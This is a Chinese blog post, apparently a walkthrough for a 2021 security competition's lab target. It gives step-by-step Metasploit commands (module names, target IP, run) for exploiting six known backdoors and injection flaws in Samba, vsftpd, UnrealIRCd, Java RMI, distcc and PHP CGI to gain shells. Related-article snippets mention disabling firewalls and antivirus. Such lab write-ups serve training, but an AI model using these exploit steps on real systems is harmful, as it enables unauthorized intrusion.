网络空间安全大赛

最新推荐文章于 2024-05-11 22:55:30 发布
最新推荐文章于 2024-05-11 22:55:30 发布
阅读量340 收藏 1
点赞数 1
文章标签: 安全 web安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzqk/article/details/128345818
版权

2021年星光国赛题

混战靶机漏洞利用

一、Samba MS-RPC Shell命令注入漏洞(445)

Samba 中负责在 SAM 数据库更新用户口令的代码未经过滤便将用户输入传输给了

/bin/sh。

如果在调用 smb.conf 中定义的外部脚本时,通过对 /bin/sh 的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以 nobody 用户的权限执行任意命令。

1. 在kali 中执行msfconsole,启动 metasploit

2. use exploit/multi/samba/usermap_script选择漏洞

3. set RHOST 192.168.56.102 设置要攻击的机器IP

4. run,开始攻击

5. 利用成功,执行uname -a验证

二、Vsftpd 源码包后门漏洞(21)

在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

1.在kali 中执行msfconsole,启动metasploit

2.use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行uname -a验证

三、UnreallRCd 后门漏洞(6667)

在2009年11月到2010年6月间分布于某些镜面站点的 UnreallRCd,在 DEBUG3DOLOG_SYSTEM 宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

1.在kali中执行msfconsole,启动metasploit

2.use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

3.set RHOST 192.168.56.102设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行uname -a验证

四、Java RMI SERVER 命令执行漏洞(1099)

Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

1.在kali中执行msfconsole,启动metasploit

2.use exploit/multi/misc/java_rmi_server,选择漏洞

3.set RHOST 192.168.56.102设置要攻击的机器IP

4.run,开始攻击

5.利用成功,得到 meterpreter shell

五、Distcc 后门漏洞(3632)

  1. nmap --script=vuln -p 3632 192.168.84.128

Distcc 用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是 xcode1.5 版本及其他版本的 distcc2.x 版本配置对于服务器端口的访问不限制。

1.在kali 中执行msfconsole,启动metasploit

2.msf>use exploit/unix/misc/distcc_exec选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行id查看权限,uname -a验证服务器信息

六、PHP CGI 参数注入执行漏洞

GI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

漏洞影响版本 php < 5.3.12 or php < 5.4.2

1.在kali中执行msfconsole,启动metasploit

2.msf>use exploit/multi/http/php_cgi_arg_injection 选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器lP

4.run,开始攻击

5.meterpreter> Is 获得 meterpreter

Hackers1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4381
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
SambaMS-RPC Shell命令注入漏洞(CVE-2007-2447)
最新发布
m0_62670778的博客
05-11 429
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 5721
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机(Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4109
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
Metasploit(九) 后漏洞利用
u010680986的博客
09-18 318
1. 清楚痕迹 1)禁用防火墙 首先,需要检查防火墙是否启动:run getcountermeasure meterpreter中打开被攻击系统的shell:netsh firewall show opmode 禁用:netsh firewall show opmode mode=disable 2)禁用杀毒软件和日志删除 文本编辑器打开killav.rb脚本,该文件位置在opt/framework/msf3/scripts/killav.rb,这个脚本里有一些基本的杀毒软件进程,运行会在被攻击
2019年某省院校技能大赛中职组《网络空间安全》样题 .doc
09-23
2019年某省院校技能大赛中职组的《网络空间安全》比赛,旨在检验学生的实战技能,包括系统渗透测试和分组对抗。以下是比赛的具体内容和相关知识点: 一、赛项时间安排 比赛共3小时,分为三个阶段,分别是平台搭建与...
2018 年(第四届)全国网络空间安全大赛 线上赛解题报告
04-27
2018 年(第四届)全国网络空间安全大赛 线上赛解题报告 主办单位:中国兵工学会信息安全与对抗技术专业委员会 承办单位:西安工业大学 协办单位:西安胡门网络技术有限公司
2019年江苏省职业技能大赛网络空间安全赛项”竞赛样题.docx
05-11
2019年江苏省职业技能大赛的“网络空间安全”赛项旨在检验参赛者的网络安全技能,包括系统渗透测试、安全加固、攻防对抗等方面的能力。 在竞赛的第一阶段,参赛者需要在单兵模式下进行系统渗透测试与安全加固。具体...
2019年网络空间安全全国职业院校技能大赛训练题三及答案.doc
09-23
2019年网络空间安全全国职业院校技能大赛训练题三及答案
2019年网络空间安全全国职业院校技能大赛训练题一及答案.doc
09-23
网络空间安全全国职业院校技能大赛训练题解析 以下是对给定文件的详细解析: CentOS 5.5 服务器安全配置 1.1 启动 MySQL 服务 在 CentOS 5.5 服务器场景中,使用 Linux 命令行开启 MySQL 服务的命令是:`service...
Metasploitable2中FTP漏洞
m0_56368726的博客
11-04 329
1、查看靶机的ip Metasploitable2默认的用户名是 :msfadmin 密码是: msfadmin 登陆之后使用ip addr查看ip地址 靶机的ip为192.168.43.253
metasploitable2靶机
雨泽网络工作室
08-16 4812
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
metasploitable2漏洞利用之ssh
u011250160的博客
04-22 1317
端口扫描 信息搜集发现是openssh4.7p1 找来找去也没有什么可以直接获取shell的漏洞 下面这个是枚举ssh用户名的脚本 发现用户名 msf里的模块也可以爆破密码,不过相比之下,速度不如hydra 破解出了ssh的用户名和密码就可以去登录了 在linux下直接命令行去连就行了 在windows下需要一个客户端 我这里用的是XShell 注意这里登录后的权限不是root 提权还不会,就先到这把 ...
Metasploit Framework(MSF)对Metasploitable2的渗透解析
黄乔国PHP
05-15 918
Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。这样方便我们学习MSF框架的使用。并且开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了相关Web漏洞演练平台,如:TWiki,phpMyAdmin。
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7316
此次演示环境 1、靶机: Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
kali linux对Metasploitable2漏洞利用, postgresql的 代码执行获得反弹shell 笔记
边城浪子的博客
09-20 664
利用 msf 下 postgresql的 代码执行获得反弹shell. 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:探测 nmap 192.168.172.129 nmap -sV -p 5432 192.168.172.129 step2:漏...
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 5759
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1780
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机练
ctf网络空间安全大赛实验室领队策划
05-15
CTF(Capture The Flag)网络空间安全大赛是一项旨在提升网络安全技术能力的比赛,对于网络安全技术人员的培养和拓展具有非常重要的意义。CTF网络空间安全大赛实验室领队的角色,就是承担起比赛的策划和组织工作。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值